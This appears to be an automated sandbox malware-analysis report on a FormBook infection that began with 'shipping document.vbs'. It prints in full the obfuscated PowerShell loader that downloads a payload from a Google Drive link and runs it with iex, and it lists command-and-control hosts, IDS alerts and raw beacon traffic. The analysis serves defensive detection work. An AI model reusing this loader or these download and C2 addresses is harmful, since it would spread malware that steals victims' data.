        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idu

        Snort Signatures

        Timestamp:04/23/24-07:55:11.026123
        SID:2855464
        Source Port:49720
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/23/24-07:55:13.838498
        SID:2855464
        Source Port:49721
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/23/24-07:55:19.489536
        SID:2855465
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/23/24-07:55:34.111211
        SID:2855464
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/23/24-07:54:55.001136
        SID:2855465
        Source Port:49719
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Multi AV Scanner detection for submitted file
        Source: shipping document.vbsReversingLabs: Detection: 31%
        Source: shipping document.vbsVirustotal: Detection: 40%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49716 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000009.00000002.1926528931.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD9%m! source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe
        Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.1938944597.0000000008184000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb: source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wab.pdbGCTL source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp
        Source: Binary string: wab.pdb source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49719 -> 80.240.20.220:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 157.7.107.63:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49721 -> 157.7.107.63:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49723 -> 157.7.107.63:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 172.217.16.36:80
        Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg== HTTP/1.1Host: www.jthzbrdb.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6 HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /3g97/ HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 195Cache-Control: max-age=0Origin: http://www.a-two-spa-salon.comReferer: http://www.a-two-spa-salon.com/3g97/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 6a 4a 45 44 67 46 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 4d 78 46 39 53 47 65 4f 74 31 68 4e 66 42 67 4f 2b 75 6d 48 71 34 64 4c 4a 67 6b 4b 52 42 31 65 38 64 2f 50 6e 43 4f 58 73 31 2b 51 34 69 74 33 74 6a 61 6a 77 61 5a 53 50 70 6e 66 63 32 32 5a 7a 4f 50 45 42 62 51 61 6c 62 58 67 50 6a 71 6e 69 6e 54 2f 55 34 34 59 57 39 72 57 6d 58 4a 55 77 39 55 79 77 30 5a 56 2b 54 44 6e 41 4f 36 64 68 46 57 2f 49 72 62 47 71 72 62 46 4c 47 73 4e 37 39 57 34 46 55 35 2f 7a 66 6e 66 41 30 56 75 67 74 70 51 37 78 49 46 53 59 46 41 34 39 70 4c 37 42 50 49 34 74 7a 32 6e 50 69 64 74 4a 73 Data Ascii: jJEDgF=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpQ7xIFSYFA49pL7BPI4tz2nPidtJs
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 05:54:55 GMTContent-Type: text/htmlContent-Length: 1409Connection: closeVary: Accept-EncodingETag: "629dd94c-581"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 